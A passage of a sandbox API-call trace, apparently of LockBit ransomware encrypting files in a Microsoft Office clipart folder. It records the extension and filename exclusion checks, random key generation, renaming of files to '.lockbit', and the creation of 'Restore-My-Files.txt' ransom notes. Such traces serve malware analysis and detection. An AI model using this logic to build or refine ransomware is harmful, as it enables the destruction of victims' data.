[0175.769] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.769] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.770] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.770] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00728_.WMF") returned -1 [0175.771] lstrcmpiW (lpString1="ntldr", lpString2="SO00728_.WMF") returned -1 [0175.771] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00728_.WMF") returned -1 [0175.771] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00728_.WMF") returned -1 [0175.771] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00728_.WMF") returned -1 [0175.771] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00728_.WMF") returned 1 [0175.771] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00728_.WMF") returned -1 [0175.771] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.771] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00728_.WMF") returned=".WMF" [0175.771] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.771] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.771] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.772] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.773] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00728_.WMF.lockbit") returned 72 [0175.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00728_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00728_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.774] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.774] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.774] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5976) returned 1 [0175.774] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.775] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.786] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00728_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00728_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.786] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.786] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0175.786] free (_Block=0x1fa2ed8) [0175.786] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00728_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.786] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.786] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.786] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5096e900, ftCreationTime.dwHighDateTime=0x1bd4b0c, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5096e900, ftLastWriteTime.dwHighDateTime=0x1bd4b0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00732_.WMF", cAlternateFileName="")) returned 1 [0175.786] lstrcmpiW (lpString1=".", lpString2="SO00732_.WMF") returned -1 [0175.786] lstrcmpiW (lpString1="..", lpString2="SO00732_.WMF") returned -1 [0175.786] PathFindExtensionW (pszPath="SO00732_.WMF") returned=".WMF" [0175.786] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.787] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.788] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.788] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00732_.WMF") returned -1 [0175.789] lstrcmpiW (lpString1="ntldr", lpString2="SO00732_.WMF") returned -1 [0175.789] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00732_.WMF") returned -1 [0175.789] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00732_.WMF") returned -1 [0175.789] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00732_.WMF") returned -1 [0175.789] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00732_.WMF") returned 1 [0175.789] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00732_.WMF") returned -1 [0175.789] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.789] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00732_.WMF") returned=".WMF" [0175.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.789] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.789] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.790] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.790] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00732_.WMF.lockbit") returned 72 [0175.790] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00732_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00732_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.791] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.791] malloc (_Size=0x40068) returned 0x3df0008 [0175.791] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5116) returned 1 [0175.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.793] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.795] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00732_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00732_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.795] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.795] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.796] free (_Block=0x1fa2ed8) [0175.796] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00732_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.797] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.797] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.797] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e348f00, ftCreationTime.dwHighDateTime=0x1bd4b0c, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e348f00, ftLastWriteTime.dwHighDateTime=0x1bd4b0c, nFileSizeHigh=0x0, nFileSizeLow=0x660, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00734_.WMF", cAlternateFileName="")) returned 1 [0175.797] lstrcmpiW (lpString1=".", lpString2="SO00734_.WMF") returned -1 [0175.797] lstrcmpiW (lpString1="..", lpString2="SO00734_.WMF") returned -1 [0175.797] PathFindExtensionW (pszPath="SO00734_.WMF") returned=".WMF" [0175.797] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.797] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.798] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.798] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00734_.WMF") returned -1 [0175.799] lstrcmpiW (lpString1="ntldr", lpString2="SO00734_.WMF") returned -1 [0175.799] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00734_.WMF") returned -1 [0175.799] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00734_.WMF") returned -1 [0175.799] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00734_.WMF") returned -1 [0175.799] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00734_.WMF") returned 1 [0175.799] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00734_.WMF") returned -1 [0175.799] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.799] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00734_.WMF") returned=".WMF" [0175.799] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.799] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.799] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.800] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.800] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00734_.WMF.lockbit") returned 72 [0175.801] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00734_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00734_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, 